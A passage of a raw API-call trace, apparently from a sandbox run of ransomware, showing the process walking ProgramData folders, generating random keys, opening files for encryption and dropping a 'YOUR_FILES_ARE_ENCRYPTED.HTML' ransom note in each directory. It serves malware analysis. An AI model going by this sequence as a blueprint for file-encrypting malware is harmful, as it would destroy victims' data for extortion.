dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0157.142] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=16412) returned 1 [0157.142] GetProcessHeap () returned 0x270000 [0157.142] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0157.146] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="07") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A4") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="11") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="14") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="02") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="B3") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8C") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C8") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0D") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="9F") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C8") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="71") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="E4") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="AD") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="8F") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0C") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="AC") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="91") returned 2 [0157.147] wsprintfW (in: 
param_1=0x4ebda7e, param_2="%02X" | out: param_1="69") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="A0") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="22") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="28") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="58") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="3F") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0B") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F4") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="71") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="9D") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="51") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="8B") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="44") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="78") returned 2 [0157.148] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" [0157.148] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0157.148] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0157.151] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 1 [0157.151] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat") returned 62 [0157.151] lstrcmpW (lpString1="RacWmiEventData.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.151] PathFindExtensionW (pszPath="RacWmiEventData.dat") returned=".dat" [0157.151] lstrlenW (lpString=".dat") returned 4 [0157.151] PathFindExtensionW (pszPath="RacWmiEventData.dat") returned=".dat" [0157.151] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.152] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0157.154] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 0 [0157.167] FindClose 
(in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.167] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0157.167] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.167] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.170] CloseHandle (hObject=0x5a0) returned 1 [0157.171] GetProcessHeap () returned 0x270000 [0157.171] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0157.171] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0157.171] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp") returned 37 [0157.171] GetProcessHeap () returned 0x270000 [0157.172] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0157.172] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp" | out: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp" [0157.172] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*" [0157.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.172] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.172] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab6ad860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab6ad860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab6f9b20, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql5130.tmp", cAlternateFileName="")) returned 1 [0157.172] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql5130.tmp") returned 49 [0157.172] lstrcmpW (lpString1="sql5130.tmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.172] PathFindExtensionW (pszPath="sql5130.tmp") returned=".tmp" [0157.172] lstrlenW (lpString=".tmp") returned 4 [0157.172] PathFindExtensionW (pszPath="sql5130.tmp") returned=".tmp" [0157.172] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab76bf40, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql517F.tmp", cAlternateFileName="")) returned 1 [0157.172] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql517F.tmp") returned 49 [0157.172] lstrcmpW (lpString1="sql517F.tmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.172] PathFindExtensionW (pszPath="sql517F.tmp") returned=".tmp" [0157.172] lstrlenW (lpString=".tmp") returned 4 [0157.173] PathFindExtensionW (pszPath="sql517F.tmp") returned=".tmp" [0157.173] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab76bf40, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql517F.tmp", cAlternateFileName="")) returned 0 [0157.173] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.173] 
wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0157.173] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.173] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.176] CloseHandle (hObject=0x5a0) returned 1 [0157.176] GetProcessHeap () returned 0x270000 [0157.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0157.177] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 0 [0157.177] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.177] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0157.177] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.180] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.183] CloseHandle (hObject=0x598) returned 1 [0157.183] GetProcessHeap () returned 0x270000 [0157.184] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0157.184] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0e963b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0e963b0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Search", cAlternateFileName="")) returned 1 [0157.184] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned 35 [0157.184] GetProcessHeap () returned 0x270000 [0157.184] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.186] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search" [0157.187] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*" [0157.187] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0e963b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0e963b0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.187] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0e963b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0e963b0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.187] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Data", cAlternateFileName="")) returned 1 [0157.187] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned 40 [0157.187] GetProcessHeap () returned 0x270000 [0157.187] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.188] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data" [0157.188] lstrcatW (in: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*" [0157.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.190] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.190] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0157.190] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned 53 [0157.190] 
GetProcessHeap () returned 0x270000 [0157.190] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.193] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications" [0157.193] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*" [0157.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.193] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.194] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd231e170, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd231e170, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 1 [0157.194] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd231e170, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd231e170, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 0 [0157.194] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.194] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0157.194] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.195] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.197] CloseHandle (hObject=0x58c) returned 1 [0157.198] GetProcessHeap () returned 0x270000 [0157.198] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.198] FindNextFileW (in: hFindFile=0x42f3180, 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0ebc510, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0157.198] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned 45 [0157.198] GetProcessHeap () returned 0x270000 [0157.199] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.199] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp" [0157.199] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*") 